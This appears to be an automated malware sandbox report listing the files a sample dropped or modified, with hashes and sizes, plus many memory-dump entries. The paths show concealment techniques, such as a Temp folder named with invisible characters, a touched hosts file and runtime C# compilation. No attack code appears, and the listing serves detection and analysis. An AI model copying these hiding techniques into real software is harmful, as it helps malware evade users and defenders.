396b5ed49de01d467a95fe69e8a65dc8b0fe8865df4b737a33dbc865942d8232c5740113f3d96560afb70c6ee714c9b1d6a9e8907b510b5f410ae336a2a2f480

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Desktop\LimitSkip.docx

Filesize
177KB

MD5
00a28eeb0dbee62c017fb592b0d917b7

SHA1
2c5a789f8a3785b876673e29e3c943238fec282f

SHA256
869b995a34db412bc0af7d369970e8f413da986165587a486ea721546c3226b8

SHA512
3adda2159de8a8ad1cdf37f99527da45a5c30ce273a2be1e57f50d252d4357dffa833adbdc9d7798c1625b6db3b669bc372493c3491430a25fa983ece9b496d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Desktop\ResumeUpdate.docx

Filesize
16KB

MD5
24c29c0e9da310072deec3373b828f7c

SHA1
140897d4bf28ed958cbb910a24b49417130a0070

SHA256
e39a9a8954754a8944b516841fea76538a8d0fc8124d3d8fa4ab2d8c6577907d

SHA512
569403fc6b7693873b10a9a5229a19ab85737617c90f72323a43d8a03fd37b48d793855eb6187bd89318c810070aa7b46224ce7f9a85dff2e4fb23dd54915274

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Desktop\SkipResize.png

Filesize
219KB

MD5
50006b33b1a96830c2e4f1361d2691fb

SHA1
6905b74242a958adf33f81900d88b7ae2a4d92bb

SHA256
32e2ae14c8a1ef30fa0c8f11a5ac0ac0fe8b89a261a46cd06c31d7381ade1aca

SHA512
bfedc5a21307d06077e870a05461ad3d0cdda727ef32d5e9be39f30ae0ac514f72f5ca896b87ac7b4faa0e6d71b18770586b6aee442fdb2d156aaddad0a8ae17

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Desktop\UnblockMeasure.png

Filesize
261KB

MD5
a6244614f5a549d7b91139a534d53cd3

SHA1
d0e826d8b7d3ce1eccb4134e0ce08b6e82e625a3

SHA256
2665bdd3239d3ebae8ae33c208f3e100ac676917f556a455ce27a997bad44b7f

SHA512
59fea48ddaca1ff1437924e210370ac294fda4e5a47dcfc7b7eb128dc668a41a539c4a84426102224135b2ab2407737906f137ec1249d8f73c2c58a3db525e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Documents\BackupPing.vsx

Filesize
1.1MB

MD5
e7c5ed8b254076d84e8f4a038e094eb4

SHA1
5cc5fa93d282d450dc757282c8223a8af6968ab0

SHA256
f7ef6bebdcb3620610fb63cfec9dd27e5e1140329b9387c43796ab3cc0c55c8a

SHA512
f9070344b409f9f456f3fb183bfd4947c249f358013074748f30057a3044639e9e4a711ffa3e87e928c962cb2c941d122d0646575f4caa6534964bbb05746e7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Documents\LimitCompress.docx

Filesize
17KB

MD5
0256a5c8e1995014255b484dd012edd0

SHA1
2ea7bae54ad87af581de933ea332e816080bc885

SHA256
d29068d13f604d7f7e5550b4725b94e4d69bf7f43b50310bb808b06d0e8dc799

SHA512
8e4dc25d257d053418144ad2442fc68ef203374e004144a2ccbe36f5c479e663f79e74e0e4f578e7f50a746e2585954858b7901c9a19c259887196e741ed76ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Documents\LockWait.docx

Filesize
13KB

MD5
9f1d87ba3172ad05684c79a5818984f8

SHA1
f6fe3cac23cb7dab493d176578363acbf42288c4

SHA256
6a73d9f3672ea4ee2d927fb01d8e709d1f2d5286f9a13ebb6bfc8452a49aaf09

SHA512
fb7c88e6d5682048cdc299df269a99317cdcdf82423e6a765c34d69116b8805dccabce805ed0bdcfd1a656e1edb501d2c902ea3cd41f1ce53551f4eb6b04dac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Documents\MergeWrite.docx

Filesize
18KB

MD5
b0261fd634426c5a7c27a18287f4d08b

SHA1
bf4acd312d2a785767eb7434a6780661fef601dc

SHA256
72e8713dcbdcc400fd4fc877ca4adda5543de897a496474d4a44b5eec769a1a4

SHA512
128df8f40c890595b89e7ade7a6825a2c2f12d4b42790d1e9f1d9563402bc15e4e8e4f79a4d53e30b3d9e65c93b66df80c967b1abfcae1a456420806bdf2800f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Documents\OutOptimize.xlsx

Filesize
12KB

MD5
063790b2bab01e88b0540177989e5f17

SHA1
9b8202edec2f487f9c8add813cbc5841dd997afb

SHA256
0efd1edae8ff13dec8a7679375399aa68442c42efcd94d456a7434d3cfad6bbb

SHA512
29ee78a34a76cca4ecb6a88856d3efd83c37cbba0044eafd90a10fe34e2b96cb151fd6cef0a7375905efa9f4ee9aa9c7ecd8c1d45d513b15375a53f7d7268075

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‍ ‏ \Common Files\Documents\RenameRestart.doc

Filesize
1.1MB

MD5
4fc6caa2d25b2b8a13f4350353c44840

SHA1
6d2d3fb605bc45770f7bde4f1a12cff3baea1dd6

SHA256
9d8d641323d17a15e74136cb13aa6507f74b58a8b019b563e610253e5027865f

SHA512
93dafbf78fa2618489916eaf6681705ac25a7ea8d5fdb41cb28cdc0b08773e5dd098792f11feef00e9c8f6b6dc0c8c8a0b91c5de96f54db372ceb11cfc1f55fc

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xlfe1itp\CSC99595D6F26E249DDB9D26F7BECC7B37.TMP

Filesize
652B

MD5
16d2c93b8efdf35222aea5f937dabbe0

SHA1
9410901834bf92537af121589a5b62dc83b02c28

SHA256
1a2c0f9ce09adbabf346b26f774173494602a1df61b6407332a0eebdac36af51

SHA512
b532e9806c9610792f333b4d5f1fd0b5183a33cf6c2b1ad4eecb6be1a8b62778f8a339b0c622825fe78fc90fe5649a04dffc6612361a5c7151112930fbc6e04e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xlfe1itp\xlfe1itp.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xlfe1itp\xlfe1itp.cmdline

Filesize
607B

MD5
7ffa35ce654e3f66fb00bba4eaab422e

SHA1
f9279a61d917fd2363f92c97f22c28e7f4ed4b80

SHA256
bf294915444988b8e6442a7d7bb351eb5d1f26564850b60f52c429fe9234cb2a

SHA512
fc927d0e5cb155a2354a4d0acad953259a9ab538ed403449c319f05d65d937577ed7d3c7e00160b9a11adeb6ad96708503ef4977385da7fa7efdcb2934f9d4b8

Download Submit
memory/1348-90-0x000002B402710000-0x000002B402732000-memory.dmp

Filesize
136KB

Download
memory/3196-204-0x000002D11E590000-0x000002D11E598000-memory.dmp

Filesize
32KB

Download
memory/3632-25-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp

Filesize
5.9MB

Download
memory/3632-47-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp

Filesize
140KB

Download
memory/3632-159-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp

Filesize
1.5MB

Download
memory/3632-82-0x00007FFB98FE0000-0x00007FFB99003000-memory.dmp

Filesize
140KB

Download
memory/3632-83-0x00007FFB89D90000-0x00007FFB89EAC000-memory.dmp

Filesize
1.1MB

Download
memory/3632-78-0x00007FFB9A0D0000-0x00007FFB9A0DD000-memory.dmp

Filesize
52KB

Download
memory/3632-48-0x00007FFB9F500000-0x00007FFB9F50F000-memory.dmp

Filesize
60KB

Download
memory/3632-76-0x00007FFB9A0E0000-0x00007FFB9A0F4000-memory.dmp

Filesize
80KB

Download
memory/3632-74-0x000002B096EC0000-0x000002B097238000-memory.dmp

Filesize
3.5MB

Download
memory/3632-269-0x00007FFB9A140000-0x00007FFB9A16E000-memory.dmp

Filesize
184KB

Download
memory/3632-73-0x00007FFB88DE0000-0x00007FFB89158000-memory.dmp

Filesize
3.5MB

Download
memory/3632-70-0x00007FFB94960000-0x00007FFB94A18000-memory.dmp

Filesize
736KB

Download
memory/3632-69-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp

Filesize
140KB

Download
memory/3632-68-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp

Filesize
5.9MB

Download
memory/3632-66-0x00007FFB9A140000-0x00007FFB9A16E000-memory.dmp

Filesize
184KB

Download
memory/3632-63-0x00007FFB9A7D0000-0x00007FFB9A7E9000-memory.dmp

Filesize
100KB

Download
memory/3632-64-0x00007FFB9A170000-0x00007FFB9A17D000-memory.dmp

Filesize
52KB

Download
memory/3632-60-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp

Filesize
1.5MB

Download
memory/3632-58-0x00007FFB98FE0000-0x00007FFB99003000-memory.dmp

Filesize
140KB

Download
memory/3632-56-0x00007FFB991B0000-0x00007FFB991C9000-memory.dmp

Filesize
100KB

Download
memory/3632-54-0x00007FFB99010000-0x00007FFB9903D000-memory.dmp

Filesize
180KB

Download
memory/3632-160-0x00007FFB9A7D0000-0x00007FFB9A7E9000-memory.dmp

Filesize
100KB

Download
memory/3632-285-0x00007FFB94960000-0x00007FFB94A18000-memory.dmp

Filesize
736KB

Download
memory/3632-287-0x00007FFB88DE0000-0x00007FFB89158000-memory.dmp

Filesize
3.5MB

Download
memory/3632-288-0x000002B096EC0000-0x000002B097238000-memory.dmp

Filesize
3.5MB

Download
memory/3632-310-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp

Filesize
140KB

Download
memory/3632-315-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp

Filesize
1.5MB

Download
memory/3632-309-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp

Filesize
5.9MB

Download
memory/3632-340-0x00007FFB9F500000-0x00007FFB9F50F000-memory.dmp

Filesize
60KB

Download
memory/3632-348-0x00007FFB9A140000-0x00007FFB9A16E000-memory.dmp

Filesize
184KB

Download
memory/3632-349-0x000002B096EC0000-0x000002B097238000-memory.dmp

Filesize
3.5MB

Download
memory/3632-347-0x00007FFB9A7D0000-0x00007FFB9A7E9000-memory.dmp

Filesize
100KB

Download
memory/3632-346-0x00007FFB9A170000-0x00007FFB9A17D000-memory.dmp

Filesize
52KB

Download
memory/3632-345-0x00007FFB89160000-0x00007FFB892D7000-memory.dmp

Filesize
1.5MB

Download
memory/3632-344-0x00007FFB98FE0000-0x00007FFB99003000-memory.dmp

Filesize
140KB

Download
memory/3632-343-0x00007FFB991B0000-0x00007FFB991C9000-memory.dmp

Filesize
100KB

Download
memory/3632-342-0x00007FFB99010000-0x00007FFB9903D000-memory.dmp

Filesize
180KB

Download
memory/3632-341-0x00007FFB9F630000-0x00007FFB9F653000-memory.dmp

Filesize
140KB

Download
memory/3632-339-0x00007FFB8A1C0000-0x00007FFB8A7A9000-memory.dmp

Filesize
5.9MB

Download
memory/3632-338-0x00007FFB89D90000-0x00007FFB89EAC000-memory.dmp

Filesize
1.1MB

Download
memory/3632-337-0x00007FFB9A0D0000-0x00007FFB9A0DD000-memory.dmp

Filesize
52KB

Download
memory/3632-336-0x00007FFB9A0E0000-0x00007FFB9A0F4000-memory.dmp

Filesize
80KB

Download
memory/3632-334-0x00007FFB94960000-0x00007FFB94A18000-memory.dmp

Filesize
736KB

Download
memory/3632-335-0x00007FFB88DE0000-0x00007FFB89158000-memory.dmp

Filesize
3.5MB

Download